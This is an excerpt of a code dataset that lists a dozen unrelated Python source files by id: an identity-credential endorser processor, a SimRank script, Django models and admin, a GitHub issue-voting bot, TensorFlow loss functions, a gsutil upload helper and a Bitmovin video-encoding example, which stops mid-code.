id
stringlengths 3
8
| content
stringlengths 100
981k
|
---|---|
485249
|
import json
from sqlalchemy import update
from api.core.config import settings
from api.core.profile import Profile
from api.db.models.v1.governance import CredentialTemplate
from api.db.session import async_session
from api.endpoints.models.v1.errors import NotFoundError
from api.endpoints.models.v1.governance import TemplateStatusType
from api.protocols.v1.endorser.endorser_protocol import (
DefaultEndorserProtocol,
processing_states,
cancelled_states,
)
class CreateCredDefProcessor(DefaultEndorserProtocol):
def __init__(self):
super().__init__()
def get_schema_id(self, payload: dict) -> str:
try:
return payload["meta_data"]["context"]["schema_id"]
except KeyError:
return None
def get_transaction_id(self, payload: dict) -> str:
try:
return payload["transaction_id"]
except KeyError:
return None
def get_signature(self, payload: dict) -> dict:
endorser_public_did = settings.ACAPY_ENDORSER_PUBLIC_DID
self.logger.debug(f"endorser_public_did = {endorser_public_did}")
signature_json = payload["signature_response"][0]["signature"][
endorser_public_did
]
signature = json.loads(signature_json)
return signature
async def get_credential_template(
self, profile: Profile, payload: dict
) -> CredentialTemplate:
transaction_id = self.get_transaction_id(payload=payload)
try:
async with async_session() as db:
return await CredentialTemplate.get_by_transaction_id(
db, profile.tenant_id, transaction_id
)
except NotFoundError:
return None
async def approve_for_processing(self, profile: Profile, payload: dict) -> bool:
self.logger.info("> approve_for_processing()")
has_schema_id = "schema_id" in payload["meta_data"]["context"]
data_json = json.loads(payload["messages_attach"][0]["data"]["json"])
is_operation_type_102 = data_json and data_json["operation"]["type"] == "102"
template = await self.get_credential_template(profile, payload)
template_exists = template is not None
approved = has_schema_id and is_operation_type_102 and template_exists
self.logger.debug(f"has_schema_id={has_schema_id}")
self.logger.debug(f"is_operation_type_102={is_operation_type_102}")
self.logger.debug(f"template_exists={template_exists}")
self.logger.info(f"< approve_for_processing({approved})")
return approved
async def before_any(self, profile: Profile, payload: dict):
self.logger.info("> before_any()")
o = await self.get_credential_template(profile, payload)
schema_id = self.get_schema_id(payload)
self.logger.debug(f"credential_template = {o}")
self.logger.debug(f"schema_id = {schema_id}")
if o:
values = {
"state": payload["state"],
"schema_id": schema_id,
}
self.logger.debug(f"update values = {values}")
await self.update_state(payload, profile, values, o)
self.logger.info("< before_any()")
async def on_transaction_acked(self, profile: Profile, payload: dict):
self.logger.info("> on_transaction_acked()")
item = await self.get_credential_template(profile, payload)
# it is here that we get the cred def id...
# pull it out of the signature
signature = self.get_signature(payload)
public_did = signature["identifier"]
sig_type = signature["operation"]["signature_type"]
schema_ref = signature["operation"]["ref"]
tag = signature["operation"]["tag"]
cred_def_id = f"{public_did}:3:{sig_type}:{schema_ref}:{tag}"
values = {"cred_def_id": cred_def_id}
if not item.revocation_enabled:
# set Status to Active if we are not allowing revocation
# otherwise, the revocation processor will set active when appropriate
values["status"] = TemplateStatusType.active
self.logger.debug(f"update values = {values}")
stmt = (
update(CredentialTemplate)
.where(
CredentialTemplate.credential_template_id == item.credential_template_id
)
.values(values)
)
async with async_session() as db:
await db.execute(stmt)
await db.commit()
self.logger.info("< on_transaction_acked()")
async def update_state(self, payload, profile, values, item):
self.logger.info("> update_state()")
if payload["state"] in processing_states:
values["status"] = TemplateStatusType.in_progress
if payload["state"] in cancelled_states:
values["status"] = TemplateStatusType.cancelled
self.logger.debug(f"update values = {values}")
stmt = (
update(CredentialTemplate)
.where(
CredentialTemplate.credential_template_id == item.credential_template_id
)
.values(values)
)
async with async_session() as db:
await db.execute(stmt)
await db.commit()
self.logger.info("< update_state()")
async def set_active(self, profile, item):
self.logger.info("> set_active()")
values = {"status": TemplateStatusType.active}
self.logger.debug(f"update values = {values}")
stmt = (
update(CredentialTemplate)
.where(
CredentialTemplate.credential_template_id == item.credential_template_id
)
.values(values)
)
async with async_session() as db:
await db.execute(stmt)
await db.commit()
self.logger.info("< set_active()")
|
485252
|
from src.Graph import Node, Graph
from src.Similarity import Similarity
from src.utils.utils import init_graph
import numpy as np
def SimRank_one_iter(graph, sim):
for node1 in graph.nodes:
for node2 in graph.nodes:
new_SimRank = sim.calculate_SimRank(node1, node2)
sim.update_sim_value(node1, node2, new_SimRank)
# print(node1.label, node2.label, new_SimRank)
sim.replace_sim()
def SimRank(graph, sim, iteration=100):
for i in range(iteration):
SimRank_one_iter(graph, sim)
# ans = sim.get_sim_matrix()
# print(ans)
# print()
if __name__ == '__main__':
decay_factor = 0.9
iteration = 100
graph = init_graph('dataset/graph_4.txt')
sim = Similarity(graph, decay_factor)
SimRank(iteration, graph, sim)
ans = sim.get_sim_matrix()
print(ans)
np.savetxt('SimRank.txt', ans, delimiter=' ', fmt='%.2f')
|
485254
|
from django.contrib import admin
# from django.contrib.auth.admin import UserAdmin
from .models import User
class CustomUserAdmin(admin.ModelAdmin):
model = User
list_display = ('screen_name', 'twitter_id', 'is_staff')
fields = ('screen_name', 'twitter_id', 'is_protected', 'is_staff', 'is_superuser')
ordering = ('screen_name', )
admin.site.register(User, CustomUserAdmin)
|
485269
|
import logging
import arrow
import re
from requests.exceptions import HTTPError
import settings
import github_api as gh
from lib.db.models import Comment, User, ActiveIssueCommands, Issue
from lib.db.models import RunTimes, InactiveIssueCommands
'''
Command Syntax
/vote close closes issue when no nay reactions on this comment are added within voting window
/vote reopen reopens issue when see above ^^^
/vote label=<LABEL_TEXT> adds label when ^^^
/vote remove-label=<LABEL_TEXT> removes label when ^^^
/vote assign=<USER> assigns to user when ^^^
/vote unassign=<USER> unassigns from user when ^^^
'''
# If no subcommands, map cmd: None
COMMAND_LIST = {
"/vote": ("close", "reopen")
}
__log = logging.getLogger("read_issue_comments")
def get_seconds_remaining(api, comment_id):
voting_window = gh.voting.get_initial_voting_window()
seconds_remaining = gh.issues.voting_window_remaining_seconds(api, settings.URN, comment_id,
voting_window)
seconds_remaining = max(0, seconds_remaining) # No negative time
return seconds_remaining
def insert_or_update(api, cmd_obj):
# Find the comment, or create it if it doesn't exit
comment_id = cmd_obj["global_comment_id"]
issue, _ = Issue.get_or_create(issue_id=cmd_obj["issue_id"])
user, _ = User.get_or_create(user_id=cmd_obj["user"]["id"],
defaults={"login": cmd_obj["user"]["login"]})
comment, _ = Comment.get_or_create(comment_id=comment_id,
defaults={
"user": user, "text": cmd_obj["comment_text"],
"created_at": cmd_obj["created_at"],
"updated_at": cmd_obj["updated_at"]
})
command, _ = ActiveIssueCommands.get_or_create(comment=comment,
issue=issue)
update_cmd(api, command, cmd_obj["comment_text"])
def update_cmd(api, cmd_obj, comment_text):
# Need to keep the comment text and time remaining fresh
comment_id = cmd_obj.comment.comment_id
Comment.update(text=comment_text).where(Comment.comment_id == comment_id).execute()
seconds_remaining = get_seconds_remaining(api, comment_id)
ActiveIssueCommands.update(comment=Comment.get(comment_id=comment_id),
seconds_remaining=seconds_remaining).where(
ActiveIssueCommands.comment == comment_id).execute()
def has_enough_votes(votes):
# At least one negative vote will cause vote to not pass
for user, vote in votes.items():
if vote < 0:
# __log.debug("vote less than one")
return False
return True
def post_command_status_update(api, cmd, has_votes):
time = gh.misc.seconds_to_human(cmd.seconds_remaining)
command_text = cmd.comment.text
status = "passing :white_check_mark:" if has_votes else "failing :no_entry:"
body = "> {command}\n\nTime remaining: {time} - Vote status: {status}".format(
command=command_text,
time=time,
status=status)
if cmd.chaos_response:
# Update comment
resp = gh.comments.edit_comment(api, settings.URN, cmd.chaos_response.comment_id, body)
else:
# New response comment
resp = gh.comments.leave_comment(api, settings.URN, cmd.issue.issue_id, body)
user, _ = User.get_or_create(user_id=resp["user"]["id"],
defaults={"login": resp["user"]["login"]})
resp_comment, _ = Comment.get_or_create(comment_id=resp["id"],
defaults={
"user": user, "text": body,
"created_at": resp["created_at"],
"updated_at": resp["updated_at"]
})
ActiveIssueCommands.update(chaos_response=resp_comment).where(
ActiveIssueCommands.comment == cmd.comment.comment_id).execute()
def can_run_vote_command(api, cmd):
if cmd.seconds_remaining > 0:
return False
return True
def update_command_ran(api, comment_id, text):
cmd = ActiveIssueCommands.get(ActiveIssueCommands.comment == comment_id)
InactiveIssueCommands.get_or_create(comment=cmd.comment)
body = "> {command}\n\n{text}".format(command=cmd.comment.text, text=text)
gh.comments.edit_comment(api, settings.URN, cmd.chaos_response.comment_id, body)
cmd.delete_instance()
def get_command_votes(api, urn, comment_id):
votes = {}
try:
for voter, vote in gh.voting.get_comment_reaction_votes(api, urn, comment_id):
votes[voter] = vote
except HTTPError as e:
# Command possibly deleted
__log.error("Unable to get votes for command id: {id} - {msg}".format(id=comment_id,
msg=str(e)))
raise e
# Figure out what happened later
return votes
def handle_vote_command(api, command, issue_id, comment_id, votes):
orig_command = command[:]
# Check for correct command syntax, ie, subcommands
log_warning = False
if len(command):
sub_command = command.pop(0)
if sub_command == "close":
gh.issues.close_issue(api, settings.URN, issue_id)
elif sub_command == "reopen":
gh.issues.open_issue(api, settings.URN, issue_id)
else:
# Implement other commands
pass
else:
log_warning = True
if log_warning:
__log.warning("Unknown issue command syntax: /vote {command}".format(command=orig_command))
def handle_comment(api, cmd):
issue_id = cmd.issue.issue_id
comment_id = cmd.comment.comment_id
comment_text = cmd.comment.text
comment_text = re.sub('\s+', ' ', comment_text)
parsed_comment = list(map(lambda x: x.lower(), comment_text.split(' ')))
command = parsed_comment.pop(0)
votes = get_command_votes(api, settings.URN, comment_id)
update_cmd(api, cmd, comment_text)
can_run = can_run_vote_command(api, cmd)
has_votes = has_enough_votes(votes)
post_command_status_update(api, cmd, has_votes)
# We doin stuff boyz
if can_run and has_votes:
__log.debug("Handling issue {issue}: command {comment}".format(issue=issue_id,
comment=comment_text))
if command == "/vote":
handle_vote_command(api, parsed_comment, issue_id, comment_id, votes)
update_command_ran(api, comment_id, "Command Ran")
elif can_run and not has_votes:
# oops we didn't pass
update_command_ran(api, comment_id, "Vote Failed")
def is_command(comment):
comment = re.sub('\s+', ' ', comment)
parsed_comment = list(map(lambda x: x.lower(), comment.split(' ')))
cmd = parsed_comment[0]
is_cmd = False
if cmd in COMMAND_LIST:
subcommands = COMMAND_LIST.get(cmd, None)
# 4 cases
# 1. No subcommands for command
# 2. Subcommands exist, and args has it
# 3. Subcommands exist, and args don't have it
# 4. Args specify non existant subcommand
if subcommands is None:
is_cmd = True # Already have the command
else:
sub_cmd_with_args = parsed_comment[1:]
if len(sub_cmd_with_args) > 0:
sub_cmd = sub_cmd_with_args[0]
# Check cond 2
if sub_cmd in subcommands:
is_cmd = True
else:
is_cmd = False
else:
# Cond 3
is_cmd = False
return is_cmd
def poll_read_issue_comments(api):
__log.info("looking for issue comments")
run_time, created = RunTimes.get_or_create(command="issue_commands")
# No last ran time if just created
if created:
last_ran = None
else:
last_ran = arrow.get(run_time.last_ran)
paged_results = gh.comments.get_all_issue_comments(api,
settings.URN,
page='all',
since=last_ran)
# This now only finds new entries that have been either posted or updated
# Add them to our database
# If page=all, you have to loop through pages as well
for page in paged_results:
for issue_comment in page:
# Get info and store in db
# Do a check to make sure comment_id isn't a command that already ran
if is_command(issue_comment["comment_text"]):
_id = issue_comment["global_comment_id"]
# HOTFIX to not re-add command if it was already ran.
try:
InactiveIssueCommands.get(comment=_id)
except InactiveIssueCommands.DoesNotExist:
insert_or_update(api, issue_comment)
cmds = ActiveIssueCommands.select().order_by(ActiveIssueCommands.seconds_remaining)
for cmd in cmds:
try:
handle_comment(api, cmd)
except HTTPError as e:
# Check if 404 here
# Maybe remove response comment too?
cmd.comment.delete_instance()
cmd.delete_instance()
last_ran = gh.misc.dt_to_github_dt(arrow.utcnow())
RunTimes.update(last_ran=last_ran).where(RunTimes.command == "issue_commands").execute()
__log.info("Waiting %d seconds until next scheduled Issue comment polling",
settings.ISSUE_COMMENT_POLLING_INTERVAL_SECONDS)
|
485270
|
from PySide2.QtCore import *
from PySide2.QtGui import QColor
from PySide2.QtGui import QGuiApplication
from PySide2.QtGui import QFontMetrics
from PySide2.QtGui import QFont
from PySide2.QtGui import QStandardItem
from PySide2.QtWidgets import QApplication
from PySide2.QtGui import QStandardItemModel
import maya.app.renderSetup.views.proxy.renderSetup as rsProxy
class LightEditorProxy(rsProxy.DataModelListObserver, QStandardItemModel):
"""
The class provides the Qt model counterpart for the LightEditor model
"""
def __eq__(self, o):
pass
def __init__(self, parent='None'):
pass
def __ne__(self, o):
pass
def aboutToDelete(self):
"""
Cleanup method to be called immediately before the object is deleted.
"""
pass
def attachChild(self, child, pos):
pass
def child(self, row, column='0'):
pass
def createListItemProxy(self, listItem):
pass
def dispose(self):
"""
Cleanup method to be called immediately before the object is deleted.
"""
pass
def dropMimeData(self, mimeData, action, row, column, parentIndex):
pass
def findProxyItem(self, name):
pass
def flags(self, index):
pass
def mimeData(self, indices):
"""
This method builds the mimeData if the selection is correct
"""
pass
def mimeTypes(self):
pass
def refreshModel(self):
pass
def resetModel(self):
pass
def supportedDropActions(self):
pass
def type(self):
pass
def typeIdx(self):
pass
model = None
staticMetaObject = None
import maya.app.renderSetup.views.pySide.standardItem as standardItem
class LightEditorItemProxy(standardItem.StandardItem):
def __init__(self, model):
pass
def aboutToDelete(self):
"""
Cleanup method to be called immediately before the object is deleted.
"""
pass
def data(self, role):
pass
def delete(self):
pass
def dispose(self):
"""
Cleanup method to be called immediately before the object is deleted.
"""
pass
def equalsDragType(self, dragType):
pass
def findProxyItem(self, name):
pass
def genericTypeIdx(self):
pass
def getActionButton(self, column):
pass
def getActionButtonCount(self):
pass
def handleDragMoveEvent(self, event):
pass
def handleDropEvent(self, event, sceneView):
pass
def headingWidth(self, heading):
pass
def isActive(self):
pass
def isCopyable(self):
pass
def isDropAllowed(self, destinationModel):
pass
def isModelDirty(self):
"""
# The next function (isModelDirty) is a workaround.
# It should not be necessary but it is currently because we set tooltips in the treeview
# and that triggers emitDataChanged which triggers the rebuild or repopulate of the property editor.
# The proper fix will be to use columns in the treeview where each column has its own static tooltip
# and the tooltips should no longer be dynamically set by the delegate (views/renderSetupDelegate.py)
# depending on the lastHitAction
"""
pass
def modelChanged(*args, **kwargs):
pass
def onClick(self, view):
pass
def onDoubleClick(self, view):
pass
def setData(self, value, role):
pass
def supportsAction(self, action, numIndexes):
pass
model = None
class LightEditorGroupProxy(rsProxy.DataModelListObserver, LightEditorItemProxy):
"""
The class provides the Qt model counterpart for the LightEditorGroup
"""
def __init__(self, model):
pass
def aboutToDelete(self):
"""
Cleanup method to be called immediately before the object is deleted.
"""
pass
def acceptsDrops(self, attribute):
pass
def attachChild(self, override, pos):
pass
def createListItemProxy(self, listItem):
pass
def data(self, role):
pass
def dispose(self):
"""
Cleanup method to be called immediately before the object is deleted.
"""
pass
def type(self):
pass
def typeIdx(self):
pass
class LightEditorLightProxy(LightEditorItemProxy):
"""
The class provides the Qt model counterpart for the LightEditorLight
"""
def __init__(self, model):
pass
def acceptsDrops(self, attribute):
pass
def columnData(self, role, column):
pass
def data(self, role):
pass
def type(self):
pass
def typeIdx(self):
pass
def getProxy(dataModel):
pass
LIGHT_EDITOR_MIME_TYPE = 'application/lightEditor'
kCollectionWarningStr = []
LIGHT_TEXT_COLOR_LOCKED = None
kFiltersMenu = []
kRelativeType = []
kFilterTransformsShapesShaders = []
kCreateRelativeOverrideAction = []
kFilterAll = []
kDragAndDrop = []
LIGHT_TEXT_COLOR_ANIMATED = None
kDragAndDropFailed = []
kAbsolute = []
kCreateConnectionOverrideAction = []
kSetLocalRender = []
LIGHT_EDITOR_ITEM_TYPE = 1013
kCameras = []
kSetVisibilityAction = []
kCreateCollectionAction = []
LIGHT_EDITOR_TYPE = 1012
kOverrideWarningStr = []
kFilterCameras = []
kRenderLayerWarningStr = []
LIGHT_EDITOR_LIGHT_TYPE = 1014
kRenameAction = []
kCreateMaterialOverrideAction = []
kLights = []
LIGHT_EDITOR_ITEM_TYPE_IDX = 13
kAOVs = []
LIGHT_EDITOR_GROUP_TYPE = 1015
kFilterGeometry = []
kRenderSettings = []
kFilterShaders = []
kFilterLights = []
kFilterTransforms = []
kSetIsolateSelectedAction = []
kExpandCollapseAction = []
kRelative = []
kSelectionTypeError = []
kConnectionType = []
kFilterCustom = []
LIGHT_TEXT_COLOR_OVERRIDEN_BY_US = None
kAbsoluteType = []
kNewFilter = []
kMaterialType = []
kCreateShaderOverrideAction = []
LIGHT_EDITOR_GROUP_TYPE_IDX = 15
kShaderType = []
kSetRenderableAction = []
kCreateRenderSettingsChildCollectionAction = []
LIGHT_EDITOR_LIGHT_TYPE_IDX = 14
kFilterSets = []
kSetEnabledAction = []
LIGHT_TEXT_COLOR = None
kCreateAbsoluteOverrideAction = []
LIGHT_EDITOR_TYPE_IDX = 12
kNoOverride = []
kDeleteAction = []
kFilterTransformsAndShapes = []
|
485299
|
from pysad.core.base_postprocessor import BasePostprocessor
import numpy as np
from pysad.utils.window import Window, UnlimitedWindow
class ConformalProbabilityCalibrator(BasePostprocessor):
"""This class provides an interface to convert the scores into probabilities through conformal prediction. Note that :cite:`laxhammar2013online` fits conformal calibration to already fitted samples' scores by the model whereas :cite:`ishimtsev2017conformal` fits the conformal calibration to some window of previous samples that are just before the target instance.
This calibrator transforms by providing target score divided by the number of instances that are fitted before to this calibrator as transformation result.
Args:
windowed (bool): Whether the probability calibrator is windowed so that forget scores that are older than `window_size`.
window_size (int): The size of window for running average and std. Ignored if `running_statistics` parameter is False.
"""
def __init__(self, windowed=True, window_size=300):
self.windowed = windowed
self.window_size = window_size
self.window = Window(window_size=self.window_size) if self.windowed else UnlimitedWindow()
def fit_partial(self, score):
"""Fits particular (next) timestep's score to train the postprocessor.
Args:
score (float): Input score.
Returns:
object: self.
"""
self.window.update(score)
return self
def transform_partial(self, score):
"""Transforms given score.
Args:
score (float): Input score.
Returns:
float: Processed score.
"""
return (np.sum(np.array(self.window.get()) > score)) / (len(self.window.get()))
|
485301
|
import tensorflow as tf
"""
Note that we have only one label (it is 'face'),
so num_classes = 1.
"""
from train_config import config as cfg
def localization_loss(predictions, targets, weights,sigma=1.):
"""A usual L1 smooth loss.
Arguments:
predictions: a float tensor with shape [batch_size, num_anchors, 4],
representing the (encoded) predicted locations of objects.
targets: a float tensor with shape [batch_size, num_anchors, 4],
representing the regression targets.
weights: a float tensor with shape [batch_size, num_anchors].
Returns:
a float tensor with shape [batch_size, num_anchors].
"""
abs_diff = tf.abs(predictions - targets)
abs_diff_lt_1 = tf.less(abs_diff, 1.0/sigma)
return weights * tf.reduce_sum(
tf.where(abs_diff_lt_1, 0.5 * tf.square(abs_diff), abs_diff - 0.5/sigma), axis=2
)
def classification_loss(predictions, targets):
"""
Arguments:
predictions: a float tensor with shape [batch_size, num_anchors, num_classes + 1],
representing the predicted logits for each class.
targets: an int tensor with shape [batch_size, num_anchors].
Returns:
a float tensor with shape [batch_size, num_anchors].
"""
cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(
labels=targets, logits=predictions
)
return cross_entropy
def ohem_loss(logits, targets, weights):
logits=tf.reshape(logits,shape=[-1,cfg.DATA.NUM_CLASS])
targets = tf.reshape(targets, shape=[-1])
weights=tf.reshape(weights,shape=[-1])
dtype = logits.dtype
pmask = weights
fpmask = tf.cast(pmask, dtype)
n_positives = tf.reduce_sum(fpmask)
no_classes = tf.cast(pmask, tf.int32)
predictions = tf.nn.softmax(logits)
nmask = tf.logical_not(tf.cast(pmask,tf.bool))
fnmask = tf.cast(nmask, dtype)
nvalues = tf.where(nmask,
predictions[:, 0],
1. - fnmask)
nvalues_flat = tf.reshape(nvalues, [-1])
# Number of negative entries to select.
max_neg_entries = tf.cast(tf.reduce_sum(fnmask), tf.int32)
n_neg = tf.cast(cfg.MODEL.max_negatives_per_positive * n_positives, tf.int32) + cfg.TRAIN.batch_size
n_neg = tf.minimum(n_neg, max_neg_entries)
val, idxes = tf.nn.top_k(-nvalues_flat, k=n_neg)
max_hard_pred = -val[-1]
# Final negative mask.
nmask = tf.logical_and(nmask, nvalues < max_hard_pred)
fnmask = tf.cast(nmask, dtype)
# Add cross-entropy loss.
with tf.name_scope('cross_entropy_pos'):
loss = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits,
labels=targets)
neg_loss = tf.reduce_sum(loss * fpmask)
with tf.name_scope('cross_entropy_neg'):
loss = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits,
labels=no_classes)
pos_loss = tf.reduce_sum(loss * fnmask)
return neg_loss+pos_loss
|
485343
|
from __future__ import unicode_literals
from django.db import models
from django.utils import timezone
# Create your models here.
class AdminAuthInstance(models.Model):
"""Instance of authorization from admin."""
class Meta:
verbose_name = "Admin Authorization (Record)"
verbose_name_plural = verbose_name
unique_together = ("rule", "principal")
rule = models.ForeignKey("access.Rule")
principal = models.ForeignKey("beetle.VirtualDevice")
allow = models.BooleanField(default=True)
timestamp = models.DateTimeField(auto_now_add=True)
expire = models.DateTimeField(default=timezone.now)
def __unicode__(self):
return "%d %s" % (self.rule.id, self.principal.name)
class UserAuthInstance(models.Model):
"""Instance of authentication of user."""
class Meta:
verbose_name = "User Authentication (Record)"
verbose_name_plural = verbose_name
unique_together = ("rule", "principal")
rule = models.ForeignKey("access.Rule")
principal = models.ForeignKey("beetle.VirtualDevice")
allow = models.BooleanField(default=True)
timestamp = models.DateTimeField(auto_now_add=True)
expire = models.DateTimeField(default=timezone.now)
def __unicode__(self):
return "%d %s" % (self.rule.id, self.principal.name)
class PasscodeAuthInstance(models.Model):
"""Instance of password authentication."""
class Meta:
verbose_name = "Passcode Authentication (Record)"
verbose_name_plural = verbose_name
unique_together = ("rule", "principal")
rule = models.ForeignKey("access.Rule")
principal = models.ForeignKey("beetle.VirtualDevice")
timestamp = models.DateTimeField(auto_now_add=True)
expire = models.DateTimeField(default=timezone.now)
def __unicode__(self):
return "%d %s" % (self.rule.id, self.principal.name)
class ExclusiveLease(models.Model):
"""A lease of exclusivity"""
class Meta:
verbose_name = "Exclusive (Lease)"
verbose_name_plural = verbose_name
group = models.OneToOneField("access.Exclusive")
device_instance = models.ForeignKey("network.ConnectedDevice")
timestamp = models.DateTimeField(auto_now_add=True)
expire = models.DateTimeField(default=timezone.now)
def __unicode__(self):
return "%d %s" % (self.group.id, self.device_instance.name)
|
485372
|
import argparse
import getpass
import random
import string
import sys
from hashlib import sha512
from pathlib import Path
from subprocess import call
def h(text: str) -> str:
return sha512(text.encode('UTF-8')).hexdigest()
parser = argparse.ArgumentParser(
prog='xfer', description='Temporarily upload a file to evanchen.cc/xfer'
)
random_salt = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(64))
parser.add_argument('filename', nargs='?', help='Path of file to upload')
parser.add_argument('-n', '--name', help='Name of the file to upload.')
parser.add_argument('-s', '--salt', nargs='?', const=random_salt, default='')
group = parser.add_mutually_exclusive_group()
group.add_argument('-p', '--password', help='Path to a password file, else getpass used.')
group.add_argument('-i', '--insecure', help='Specify the password via command line (insecure)')
group.add_argument('-e', '--echo', action='store_true', help="Don't hide with getpass.")
parser.add_argument(
'-d', '--dry-run', action='store_true', help='Dry run, do not actually upload file.'
)
parser.add_argument('-w', '--wipe', action='store_true', help='Erase all files.')
args = parser.parse_args()
if __name__ == "__main__":
if args.filename is not None:
if args.password:
password = Path(args.password).read_text().strip()
elif args.insecure:
password = args.insecure
elif args.echo:
password = input('Password: ').strip()
else:
while True:
password = getpass.getpass().strip()
password_confirm = getpass.getpass(prompt='Repeat: ').strip()
if password == password_confirm:
break
else:
print("Passwords did not match. Try again.")
filename = args.name or args.filename
salt = args.salt
kludge = 'evanchen.cc/xfer|' + filename + '|' + args.salt + '|' + password
h1 = h(kludge)
h2 = h(h1)
checksum = h2[0:6]
if not args.dry_run:
url = f"gs://web.evanchen.cc/xfer-payload/{h1}"
call(
f'gsutil cp "{args.filename}" {url} > /dev/null',
shell=True,
)
call(
f"gsutil -m setmeta -h 'Cache-Control:private, max-age=0, no-transform' {url}",
shell=True,
)
url = f'https://web.evanchen.cc/xfer.html?f={filename}&h={checksum}'
if salt:
url += f'&s={salt}'
print('-' * 40)
print(url)
elif args.wipe:
if 'y' in input("Are you sure? ").lower():
call(
"gsutil -m rm gs://web.evanchen.cc/xfer-payload/*",
shell=True,
)
else:
print("Need to specify a file to upload (or use --wipe to erase all).")
sys.exit(1)
|
485373
|
import os
import string
import json
import cairo
VALID_CHARS = (" !\"#$%&'()*+,-./'0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ" +
"[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~")
FORMAT_JSON = False
def updatefonts():
dir_path = os.path.dirname(os.path.realpath(__file__))
fontlist_path = os.path.join(dir_path, "fontlist.txt")
f = open(fontlist_path, 'r')
lines = f.readlines()
fonts = []
for line in lines:
font_size = line.split(",")
font_size[0] = font_size[0].strip()
font_size[1] = int(font_size[1].strip())
fonts.append(tuple(font_size))
surface = cairo.ImageSurface(cairo.FORMAT_ARGB32, 1, 1)
ctx = cairo.Context(surface)
table = {}
for font in fonts:
fontname = font[0]
fontsize = font[1]
chardata = {}
ctx.select_font_face(fontname)
ctx.set_font_size(fontsize)
for ch in list(VALID_CHARS):
x, y, width, height, dx, dy = ctx.text_extents(ch)
chardata[ch] = [x, y, width, height, dx, dy]
for i, val in enumerate(chardata[ch]):
if abs(round(val) - val) < 1e-6:
chardata[ch][i] = int(round(val))
if not fontname in table:
table[fontname] = {}
table[fontname][str(fontsize)] = chardata
json_data = json.dumps(table)
write_path = os.path.join(dir_path, "fontdata.json")
with open(write_path, 'w') as outfile:
if FORMAT_JSON:
json.dump(table, outfile, sort_keys=True, indent=4)
else:
json.dump(table, outfile, separators=(',', ':'))
|
485380
|
from bitmovin import Bitmovin, Encoding, H264CodecConfiguration, \
AACCodecConfiguration, H264Profile, StreamInput, SelectionMode, Stream, EncodingOutput, ACLEntry, ACLPermission, \
FMP4Muxing, MuxingStream, CloudRegion, DashManifest, FMP4Representation, FMP4RepresentationType, Period, \
VideoAdaptationSet, AudioAdaptationSet, LocalOutput, LocalInput
from bitmovin.errors import BitmovinError
API_KEY = '<INSERT_YOUR_API_KEY>'
INFRASTRUCTURE_ID = '<INSERT_YOUR_INFRASTRUCTURE_ID>'
CLOUD_REGION = CloudRegion.EXTERNAL
INPUT_BASE_PATH = '/tmp/inputs'
RELATIVE_INPUT_FILE_PATH = 'relative/path/to/you/input.mkv'
OUTPUT_BASE_PATH = '/tmp/outputs'
RELATIVE_OUTPUT_PATH = 'relative/path/to/your/output/'
DASH_MANIFEST_NAME = 'example_dash_manifest.mpd'
def main():
bitmovin = Bitmovin(api_key=API_KEY)
local_input = LocalInput(name='My Local Input', path=INPUT_BASE_PATH)
local_output = LocalOutput(name='My Local Output', path=OUTPUT_BASE_PATH)
created_input = bitmovin.inputs.Local.create(local_input).resource
created_output = bitmovin.outputs.Local.create(local_output).resource
encoding = Encoding(name='Local Input Output Example',
cloud_region=CLOUD_REGION,
infrastructure_id=INFRASTRUCTURE_ID)
encoding = bitmovin.encodings.Encoding.create(encoding).resource
##########################
# qualities
video_qualities = [
{'width': 1280, 'height': 720, 'bitrate': 2400000, 'bframes': None, 'profile': H264Profile.HIGH, 'level': None},
{'width': 854, 'height': 480, 'bitrate': 1200000, 'bframes': None, 'profile': H264Profile.HIGH, 'level': None},
{'width': 640, 'height': 360, 'bitrate': 800000, 'bframes': None, 'profile': H264Profile.HIGH, 'level': None},
]
audio_qualities = [
{'bitrate': 128000, 'rate': 48000},
]
##########################
# configurations
video_configs = []
audio_configs = []
for video_quality in video_qualities:
config = H264CodecConfiguration(name='h264_{}x{}_{}'.format(video_quality['width'], video_quality['height'],
video_quality['bitrate']),
rate=None,
width=video_quality['width'],
height=video_quality['height'],
bitrate=video_quality['bitrate'],
bframes=video_quality['bframes'],
profile=video_quality['profile'],
level=video_quality['level']
)
config = bitmovin.codecConfigurations.H264.create(config).resource
video_configs.append(config)
for audio_quality in audio_qualities:
config = AACCodecConfiguration(name='aac_{}_{}'.format(audio_quality['bitrate'], audio_quality['rate']),
bitrate=audio_quality['bitrate'],
rate=audio_quality['rate'])
config = bitmovin.codecConfigurations.AAC.create(config).resource
audio_configs.append(config)
video_input_stream = StreamInput(input_id=created_input.id,
input_path=RELATIVE_INPUT_FILE_PATH,
selection_mode=SelectionMode.AUTO)
audio_input_stream = StreamInput(input_id=created_input.id,
input_path=RELATIVE_INPUT_FILE_PATH,
selection_mode=SelectionMode.AUTO)
##########################
# streams
video_streams = []
audio_streams = []
for video_config in video_configs:
stream = Stream(codec_configuration_id=video_config.id,
input_streams=[video_input_stream],
name='{}_stream'.format(video_config.name))
stream = bitmovin.encodings.Stream.create(object_=stream, encoding_id=encoding.id).resource
video_streams.append(stream)
for audio_config in audio_configs:
stream = Stream(codec_configuration_id=audio_config.id,
input_streams=[audio_input_stream],
name='{}_stream'.format(audio_config.name))
stream = bitmovin.encodings.Stream.create(object_=stream, encoding_id=encoding.id).resource
audio_streams.append(stream)
acl_entry = ACLEntry(permission=ACLPermission.PUBLIC_READ)
##########################
# muxing_streams
video_muxing_streams = []
audio_muxing_streams = []
for stream in video_streams:
muxing_stream = MuxingStream(stream.id)
video_muxing_streams.append({'mux': muxing_stream, 'stream': stream})
for stream in audio_streams:
muxing_stream = MuxingStream(stream.id)
audio_muxing_streams.append({'mux': muxing_stream, 'stream': stream})
##########################
# dash muxings
video_fmp4_muxings = []
audio_fmp4_muxings = []
for video_muxing_stream in video_muxing_streams:
stream = video_muxing_stream['stream']
muxing = video_muxing_stream['mux']
encoding_output = EncodingOutput(output_id=created_output.id,
output_path=RELATIVE_OUTPUT_PATH + 'video_dash/{}/'.format(stream.name),
acl=[acl_entry])
stream_array = [muxing]
muxing = FMP4Muxing(segment_length=4,
segment_naming='seg_%number%.m4s',
init_segment_name='init.mp4',
streams=stream_array,
outputs=[encoding_output],
name='dash_video_muxing_{}'.format(stream.name))
